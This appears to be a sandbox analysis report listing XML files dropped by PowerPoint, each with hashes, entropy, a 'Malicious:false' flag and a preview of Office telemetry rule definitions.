                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):674
                                                                                                                              Entropy (8bit):4.954621155916417
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdm80nXFCjSawSCLerKXFJiQj9DFNXJjXFbEtMqcXHaSMNO5AHNUlu:2dmDXGlwArCv5RV+9c07
                                                                                                                              MD5:BCDD117E151424029040784A770A980D
                                                                                                                              SHA1:C7C28DED2644AC182DEDBC283A2DE38A0DCB3D43
                                                                                                                              SHA-256:A8F9B357507E7B5F708A8DDAB6585127A5BF82349A268B883D898A6D81F24364
                                                                                                                              SHA-512:3C1ACC9FE52E5F99E37F2025E8A0F7A595FDA9929E546751FF3BB3F1A3A7A0C76E392B73EC44E1C61E520D3703C5CD89B191229CD19D17B8B94077D6A0073BE4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="130010" V="0" DC="SM" EN="Office.Telemetry.NonOfficeEventCount" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DCa="PSP" xmlns="">.. <S>.. <UTS T="1" Id="4pjk9" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <G>.. <S T="1">.. <F N="EventName" />.. </S>.. </G>.. <C T="W" I="0" O="false" N="NonOfficeEventName">.. <S T="1" F="EventName" />.. </C>.. <C T="U64" I="1" O="false" N="EventCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):403
                                                                                                                              Entropy (8bit):5.28814420957801
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7CGkz9Q1+slte/GbOSIxSpRMFpAQUHperh7nPodXIg2NOn2sby:TMHdtrO/GbaAQierZIXIfNO2su
                                                                                                                              MD5:88B63CC3F20602F76A207B93C03345B4
                                                                                                                              SHA1:6943818C59A9BF9083606F1D008DEF05FD8E28D8
                                                                                                                              SHA-256:93771522B5964773400BE447E7E349BDBCE6AAC64D1A1D10F2F2E2C771635108
                                                                                                                              SHA-512:94E9B9D2B529A60E4B09E9A15BB6DB32C67A69CC9503C13BA3DC655F7FE10909C80862019751A11035FEF42F0CF101B4566CC51113F7A33F5A832D91049FD77B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140000" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.FileNew" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="ay4w9" />.. </S>.. <C T="B" I="0" O="false" N="IsBlank">.. <S T="1" F="IsBlank" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2018
                                                                                                                              Entropy (8bit):4.777293404555712
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dIbcrfrvPnZeAZvBQZ0UlkYNMOMML6bvJ5:cdzZvWSlYTdLCj
                                                                                                                              MD5:DEF30C1F26CD6E5CE7A53065240B8A5A
                                                                                                                              SHA1:E3CAE186AFBAC0A8D934C67CEDF049C8A0FD0E5A
                                                                                                                              SHA-256:C76F1BF7AC00C27D424BD28D263A7B824F2D027D8142DC41EE573073CFAE2335
                                                                                                                              SHA-512:C3FF026F238F8625296E7096996AAFEA06F342A896322AACB581628A4162BE1CE71CAC0789E1F96968907F62F2409BA56B8FD397CBF85C4CCFF4A37EF1C22AED
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140003" V="3" DC="SM" EN="Office.PowerPoint.PPT.Desktop.Bootime" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="B" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a0980" />.. <UTS T="2" Id="ay8ip" />.. </S>.. <C T="FT" I="0" O="false" N="Time">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="B" I="1" O="true" N="IsOpen">.. <S T="1" F="O" />.. </C>.. <C T="B" I="2" O="true" N="AssistedReading">.. <S T="1" F="H" />.. </C>.. <C T="B" I="3" O="true" N="ProtectedView">.. <S T="1" F="VP" />.. </C>.. <C T="B" I="4" O="true" N="UnprotectedView">.. <S T="1" F="VU" />.. </C>.. <C T="B" I="5" O="true" N="Benchmark">.. <S T="1" F="#" />.. </C>.. <C T="B" I="6" O="true" N="Macro1">.. <S T="1" F="M" />.. </C>.. <C T="B" I="7" O="true" N="Macro2">.. <S T="1" F="MACRO" />.. </C>.. <C T="B" I="8" O="true" N="Print">.. <S T="1" F="P" />.. </
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):411
                                                                                                                              Entropy (8bit):5.285917442502543
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7Yvkz9Q1ONeqCHHte/GbOSIdHperhydsVlrcXdF/+yYs9NOn2sby:TMHd8tcRCHg/GbSer6sQXdN+ENO2su
                                                                                                                              MD5:7CB9A06954C8F7EA39D17D0BF916DA31
                                                                                                                              SHA1:DB7D008208C5EB331078CA2E66F0CAB783FF7C45
                                                                                                                              SHA-256:7E75E83D6831A467B9300377AF5620225B1A0B22B910EB8EF5E8DE90CF33A6A2
                                                                                                                              SHA-512:B0316CA26373529A506B137A80757773AF8967A5B41948263BEB7FF55381017CA3D9D20C280BD54B64649181C78AEEA69ABB54AA14006EB88EF3E66B24BDECAB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140010" V="0" DC="SM" EN="Office.PowerPoint.PPT.Shared.FileOpen.UnknownContent" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cu9dn" />.. </S>.. <C T="W" I="0" O="true" N="UnknownNamespace">.. <S T="1" F="Namespace" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1808
                                                                                                                              Entropy (8bit):3.8018281542445833
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdHQsW5U/GbaAQier5OerrO+tNjOzeRH/ueMk/3/8//UJuNH/M//RH/ueMko3g:2dg5vir5hrrNtdv61t1vL1MrnPq7Tl7s
                                                                                                                              MD5:EB1CD2F196A315023C041B374DAE4DB6
                                                                                                                              SHA1:9D9BE578F25CE48A011E8592A59125D623E8C91B
                                                                                                                              SHA-256:EE7F6FA4EFF64254E8CC0A340FC4ABD950AFEAF55B396AA88EEC278C5544795D
                                                                                                                              SHA-512:46A6818EBA53AFA57B448B6A72D65D3EB2FECF85F6AA81D59AD0057E003929AB4BE57F7E8F39C86C9E11C0416C496A007FCFE0718413E288EB6B495665DAC893
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140011" V="0" DC="SM" EN="Office.PowerPoint.DocOperation.IncOpenMediaStreamCollision" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cv2sn" />.. <UTS T="2" Id="aya57" />.. <F T="3">.. <O T="OR">.. <L>.. <O T="OR">.. <L>.. <O T="GT">.. <L>.. <S T="2" F="Embed Video" />.. </L>.. <R>.. <V V="1" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <O T="GT">.. <L>.. <S T="2" F="Embed Audio" />.. </L>.. <R>.. <V V="1" T="U32" />.. </R>.. </O>.. </R>.. </O>.. </L>.. <R>.. <O T="AND">.. <L>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):708
                                                                                                                              Entropy (8bit):5.1490876291245
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdgQmLn/GbSerm/QP4+e/Y+yd3wM9QMfdydbNrdl4ZOYZyNO2su:2djFrmC4+eQ+i3fGbDlKpi
                                                                                                                              MD5:F2B072A878DBDA30319776F9181354B5
                                                                                                                              SHA1:A34B034ED04FC74FC68E9E8EECAFA08DB2FB716F
                                                                                                                              SHA-256:6F262B292955558D3023CF6EE4358B77BD438ADCF6672A4F03791F1714D1FA43
                                                                                                                              SHA-512:0D542A705E878AEF85BF74A21B2B66A7D224E2B6A2C8BA1513E00C0F7AD4BE2D40372C60C36B075E5974AC75BAC80052B245F156D2695A48BFD61AFDF1D346F0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140012" V="0" DC="SM" EN="Office.PowerPoint.DocOperation.UnexpectedLegacySaveDuringIncOpen" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="dd9mj" />.. </S>.. <C T="I32" I="0" O="false" N="CallStackVersion">.. <S T="1" F="CallStackVersion" />.. </C>.. <C T="W" I="1" O="false" N="CallStackPlatform">.. <S T="1" F="CallStackPlatform" />.. </C>.. <C T="W" I="2" O="false" N="CallStackTrace">.. <S T="1" F="CallStackTrace" />.. </C>.. <C T="W" I="3" O="false" N="CallStackModules">.. <S T="1" F="CallStackModules" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3643
                                                                                                                              Entropy (8bit):3.8585403228797364
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d5r5uaQMx0tdNgjmYd1wOo2YqRbYajqF19Km5KNqfkcLuS:c5duaBx0tgnVve79XsE8caS
                                                                                                                              MD5:E6332F0B0425F37C0379666AF183ECDB
                                                                                                                              SHA1:780BE899BC38720A986305DE73E8E9D41FA471BD
                                                                                                                              SHA-256:623E4F0BDEB8C252AEA9E5E390F04A42AEC1CF91AE490219EBFDF52E406FA7F8
                                                                                                                              SHA-512:F8685E9CDD66958F151DB9650A4CB038568754739B81D5BC05C45B13CBB27F125592CB9AFF9FE24D4814B336B0A1F35CF56063E804FCF1CFD9AE121E517E341C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140104" V="6" DC="SM" T="Subrule" xmlns="">.. <S>.. <UTS T="1" Id="awna7" />.. <F T="2">.. <O T="NE">.. <L>.. <S T="1" F="ActionId" M="Ignore" />.. </L>.. <R>.. <V V="43" T="U32" />.. </R>.. </O>.. </F>.. <F T="3">.. <O T="LT">.. <L>.. <S T="2" F="Time" M="Ignore" />.. </L>.. <R>.. <V V="200" T="U32" />.. </R>.. </O>.. </F>.. <F T="4">.. <O T="AND">.. <L>.. <O T="LT">.. <L>.. <S T="2" F="Time" M="Ignore" />.. </L>.. <R>.. <V V="500" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <O T="GE">.. <L>.. <S T="2" F="Time" M="Ignore" />.. </L>.. <R>.. <V V="200" T="U32" />.. </R>.. </O>.. </R>.. </O>.. </F>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2047
                                                                                                                              Entropy (8bit):4.661918439385953
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdogrj0r/GbaAQ4Wni0DScWQjEBzDysOLpf46OkPW/f22ByMOPnt5FNxuZWyp9:2dooDynOPWi1f2q9+rSxcNgNY+TNC+
                                                                                                                              MD5:89424482063261037220A94EFD99DC4A
                                                                                                                              SHA1:7BFFC7E6C7FAC34700FC902DA95476A651B96BB5
                                                                                                                              SHA-256:B98458EF1624A41740C4BCB007FE4F2BBCD7E9B9BEEDBFD7F7B026BAA38CC3F7
                                                                                                                              SHA-512:770652414E688C2A4A1327E6F4EF534DC1311BABC1EADE83121B7B0DDF5B9E58AB3747BA43061F3A4884832A59310400F7ADF67ED95439695B4BFB22F1A0A67E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140105" V="4" DC="SM" EN="Office.PowerPoint.PPT.Desktop.PPTActionsMainRule" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <R T="1" R="140104" />.. <TI T="2" I="15min" />.. <A T="3" E="TelemetrySuspend" />.. <A T="4" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="0" />.. <F N="9" />.. <F N="1" />.. <F N="10" />.. <F N="11" />.. <F N="14" />.. <F N="15" />.. <F N="16" />.. <F N="17" />.. </S>.. </G>.. <C T="U32" I="0" O="false" N="ActionId">.. <S T="1" F="0" />.. </C>.. <C T="U32" I="1" O="false" N="Tcid">.. <S T="1" F="9" />.. </C>.. <C T="B" I="2" O="false" N="Success">.. <S T="1" F="1" />.. </C>.. <C T="TAG" I="3" O="true" N="ErrorTag">.. <S T="1" F="10" />.. </C>.. <C T="I32" I="4" O="true" N="HResult">.. <S T="1" F="11" />.. </C>.. <C T="B"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):540
                                                                                                                              Entropy (8bit):5.177743933901629
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdaqvrcGf/GbaAQierCYbKOerTASNah63XhNeINOcsu:2dXmirCVrTfbhB
                                                                                                                              MD5:75AAE8B07B1FC0568EB2966263466714
                                                                                                                              SHA1:AE4CFB7BD8C6FC8AEAB77EA127A7AEACF456AAA8
                                                                                                                              SHA-256:EF958FACAD477107E7DF10F2355E444F32FB6F489A6697ECAFD4618C23E46EBE
                                                                                                                              SHA-512:E5BFADA3A32F40BCE7CCA3B942A9697A84C57836F23E4432DEC8830976A18A2E84F260A7387A6DACAD8E6919E16CF94CFC33245F7B475570BDFC966F85D7EB3A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140106" V="1" DC="SM" EN="Office.PowerPoint.PPT.Desktop.DesignerPrivacy" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a9xwd" A="iclfn" />.. <UTS T="2" Id="a9xwe" A="iclfo" />.. <US T="3">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="TAG" I="0" O="false" N="PrivacyDialogChoice">.. <S T="3" F="ULS_Tag" />.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1904
                                                                                                                              Entropy (8bit):4.9011088407184245
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdb4rn/GbaAQ4WnergD2hwSSZ7rIM9IS25fCYu8M4xEqGNdGtbUf6VhwsGTO94:2dbzRrp0OpwI8o1r+rQahNhzE7VkiAr
                                                                                                                              MD5:472521AC74AD833F687C1E485D6CBBC5
                                                                                                                              SHA1:6570CD4B100CB40852203CA3FC0D8452EA4C64A5
                                                                                                                              SHA-256:6D162CABB2A899C48D224D68D02950F84BF8724A0C41235A6493A4C4A95C160D
                                                                                                                              SHA-512:2612447E43376742B43BCE4878CE5E4BAEDDAF64A9B1E4A99E4E3E664647E3DEF63FACB3EF2AAD0C27069E4469342A2348F1EC5342C38BAB58C92BB29B27C750
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140107" V="3" DC="SM" EN="Office.PowerPoint.PPT.Desktop.DesignerSuggestSlidePerf" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a2kf9" A="icle5" />.. </S>.. <C T="U64" I="0" O="true" N="DialogShowMS">.. <S T="1" F="Dialog show ms" />.. </C>.. <C T="U64" I="1" O="true" N="DialogDismissMS">.. <S T="1" F="Dialog dismiss ms" />.. </C>.. <C T="U64" I="2" O="true" N="BaseCloneMS">.. <S T="1" F="Base Clone ms" />.. </C>.. <C T="U64" I="3" O="true" N="SaveMS">.. <S T="1" F="Save ms" />.. </C>.. <C T="U64" I="4" O="true" N="PreprocessMS">.. <S T="1" F="Preprocess ms" />.. </C>.. <C T="U64" I="5" O="true" N="ServiceMS">.. <S T="1" F="Service ms" M="Ignore" />.. </C>.. <C T="U64" I="6" O="true" N="FetchOriginalMS">.. <S T="1" F="Fetch Original ms" M="Ignore" />.. </C>.. <C T="U64" I="7" O="true" N="Pos
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1273
                                                                                                                              Entropy (8bit):4.976237681727216
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdVkrw/GbaAQ4WnerIYHwxSWIVZa7QPASiM96GMREEfoOs4xwXSUbdvAmEUiOt:2dQRrdqIqjRUewagoX1t7NyL
                                                                                                                              MD5:ED3DBD1D15D8441EEEA4418C02FC4420
                                                                                                                              SHA1:1C0B5450FCBD8B14B2AB18707AA654AA9274635D
                                                                                                                              SHA-256:9BB019D7296EE40EF23E4356AEA2DDAA7F6B6A0B5425763DCDC817585BFC9A67
                                                                                                                              SHA-512:75ECB8FECC9C2357D576F90A858503189EE53F089B8242310348E26F42BF410F59E79A2F69E877A8F8C4C87649FD08817964E4BE1FAA55D6172FD673CDFB55E5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140108" V="2" DC="SM" EN="Office.PowerPoint.PPT.Desktop.DesignerApplySuggestPerf" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a3n32" A="iclhs" />.. </S>.. <C T="U64" I="0" O="true" N="CloneMS">.. <S T="1" F="Clone ms" M="Ignore" />.. </C>.. <C T="U64" I="1" O="true" N="GetShapeIdMS">.. <S T="1" F="GetShapeId ms" M="Ignore" />.. </C>.. <C T="U64" I="2" O="true" N="MergeMS">.. <S T="1" F="Merge ms" M="Ignore" />.. </C>.. <C T="U64" I="3" O="true" N="CheckMS">.. <S T="1" F="Check ms" M="Ignore" />.. </C>.. <C T="U64" I="4" O="true" N="UndoMS">.. <S T="1" F="Undo ms" />.. </C>.. <C T="U64" I="5" O="true" N="ApplyMS">.. <S T="1" F="Apply ms" M="Ignore" />.. </C>.. <C T="U64" I="6" O="true" N="TotalMS">.. <S T="1" F="Total ms" />.. </C>.. <C T="U64" I="7" O="true" N="UserSlideID">.. <S T="1"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):440
                                                                                                                              Entropy (8bit):5.299345286860191
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdEPrQox+g/GbaAQ4WnerPX2S/rmNO2su:2dEnx+RrPXJC
                                                                                                                              MD5:C58AA7A5E57898A64BB3B656B9569310
                                                                                                                              SHA1:03B8163AA64AF897A37817C708FD308ED5E99942
                                                                                                                              SHA-256:75335C8E0097D02DC592E535C2CFD6D43928036132FB99078B091B4494B1F393
                                                                                                                              SHA-512:F6E25AAB965FAC65656D6C8C248E8EA0E281D9C305674970F72DA51AB498C90EC82B7BFD429A1A3851A76A6DBE58E88D34344793AD897249238A23C40EF40EC0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140109" V="1" DC="SM" EN="Office.PowerPoint.PPT.Desktop.DesignerProtocolValidationFailed" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="baecq" A="ictek" />.. </S>.. <C T="W" I="0" O="false" N="Reason">.. <S T="1" F="Reason" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):935
                                                                                                                              Entropy (8bit):5.004038191933016
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd7rXXXuv/GbaAQ4WnGherVXer+YHCeri4qfivXIfsDC/MzXcF6/MzXQ9oUFNm:2dX7jMrVOrH1risjygXG
                                                                                                                              MD5:B24C9BF09DCE387F17D4BA3B1AAD9291
                                                                                                                              SHA1:A5E678FCBFA2E1FC148F43E7DEC7EFEC1F8AF353
                                                                                                                              SHA-256:205A0C1AF4AAADFCC1DB698E7EECE297924F0AE897352F2D4C7D31318D21AF3A
                                                                                                                              SHA-512:45C532558CAA69225D1388D25EDF70BA54C2ECE631AE1570251A1D977E6F5DE5A22904BFF8E35DBA179193A52EEE860CBD34FF5C7F517A90930A218B6485030C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140112" V="2" DC="SM" EN="Office.PowerPoint.PPT.Desktop.DesignerApplySuggestErrors" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UACS T="1" S="Unexpected Assert" />.. <UTS T="2" Id="a3n3g" A="icleu" />.. <UTS T="3" Id="a3n32" A="iclhs" />.. <UTS T="4" Id="bar01" A="icle4" />.. <US T="5">.. <S T="3" />.. <S T="4" />.. </US>.. </S>.. <C T="TAG" I="0" O="true" N="FirstErrorTag">.. <A T="FIRST">.. <S T="1" F="ULS_Tag" M="Ignore" />.. </A>.. </C>.. <C T="TAG" I="1" O="true" N="LastErrorTag">.. <A T="LAST">.. <S T="1" F="ULS_Tag" M="Ignore" />.. </A>.. </C>.. <C T="G" I="2" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <T>.. <S T="5" />.. </T>.. <ST>.. <S T="2" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):997
                                                                                                                              Entropy (8bit):5.127330522111042
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdMRUrbZxv/GbaAQ4Wnerx3j0CUxyFMZjReUxfMM91uDfjfuUxK4xXPydIAzSx:2dMRAx2Rrp0/wWx90zRVYzhA
                                                                                                                              MD5:2BCCC5CA802212FBCEFE12E4168A9392
                                                                                                                              SHA1:256014D1E1C6B2CA2C08024CA10EB6BB2ABCBD39
                                                                                                                              SHA-256:8644841891CC9D4BF6AF26E89FEE82ACBBEC7319493B7A57B7BBA4BCB6A4CA87
                                                                                                                              SHA-512:7D28576CFD1A72E66AA9212E83986AFCC949157D8FB54174BA94D004DAD7605E3766F22B4CC8CFD427F0EADA43DA487D5735FED59B31D6AECCD51A3062FE52E7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140113" V="1" DC="SM" EN="Office.PowerPoint.PPT.Desktop.DesignerImageCompressionStats" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a7tau" A="ick35" />.. </S>.. <C T="U64" I="0" O="true" N="CompressedImageWidth">.. <S T="1" F="Compressed Image Width" />.. </C>.. <C T="U64" I="1" O="true" N="CompressedImageHeight">.. <S T="1" F="Compressed Image Height" />.. </C>.. <C T="U64" I="2" O="true" N="OriginalImageSize">.. <S T="1" F="Original Image size" />.. </C>.. <C T="U64" I="3" O="true" N="CompressedImageSize">.. <S T="1" F="Compressed Image size" />.. </C>.. <C T="U64" I="4" O="true" N="TimeTakenCompressMS">.. <S T="1" F="TimeTakenCompress ms" />.. </C>.. <C T="U64" I="5" O="true" N="TimeTakenReplacePartMS">.. <S T="1" F="TimeTakenReplacePart ms" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):684
                                                                                                                              Entropy (8bit):5.243161723233018
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdzAErk12QcMxv/GbaAQ4Wnerbv8WDLfJDL1ZzrHyQ9oUFNO2su:2dzAP2Mx2RrbvVhvRL
                                                                                                                              MD5:659CFAB09C6CD2581EA9244B550389EB
                                                                                                                              SHA1:0C3ECA63F1E8B2476BB8F7CB37A88480B5900BAB
                                                                                                                              SHA-256:FECA0568790799E4D8FB29CAD0C2B2256FC61B4C6960E013BB5F9685EFAE69F0
                                                                                                                              SHA-512:C08695B467EC6ADE7EAB7CC38EDF030EB0D73578513B0A04E648A4361979CB86C9C36013450428DA8F17E0E9115C0091CF5D6CAE432CF7B1B41A6BCA9649244C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140114" V="2" DC="SM" EN="Office.PowerPoint.PPT.Desktop.DesignerDisplaySuggestionStats" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a8ues" A="a44ww iclgn" />.. </S>.. <C T="U64" I="0" O="true" N="TimeTakenToGetSuggestionsInMS">.. <S T="1" F="TimeTakenToGetSuggestionsInMS " />.. </C>.. <C T="U64" I="1" O="true" N="TimeOutInMs">.. <S T="1" F="TimeOutInMs " />.. </C>.. <C T="G" I="2" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1000
                                                                                                                              Entropy (8bit):4.777443347474166
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdWr6r/GbaAQii0DScWQjEBi+wsvXqNO5FX/c//rEpON+PvXDS/fzwwYSRn+w4:2d6xnOJwOaE3AEcDSl
                                                                                                                              MD5:3AE7E326B52B0F408A3AB1B67B8D0543
                                                                                                                              SHA1:3791D7115E95FCAE8B2AEAE0211E3A4665704BBF
                                                                                                                              SHA-256:04DE0642C42E55D6380583079E4439D393FE570259AB4DBAF576C2778131CB03
                                                                                                                              SHA-512:331A8F4E259713A00746A6F35B2F5C1E613EFF92BB0807127E738659528C3C33BE55C3AB19963AD98C7ECD46088C21C4633F573C8378E9BDBC4EB4120CF7FA63
                                                                                                                              Malicious:false
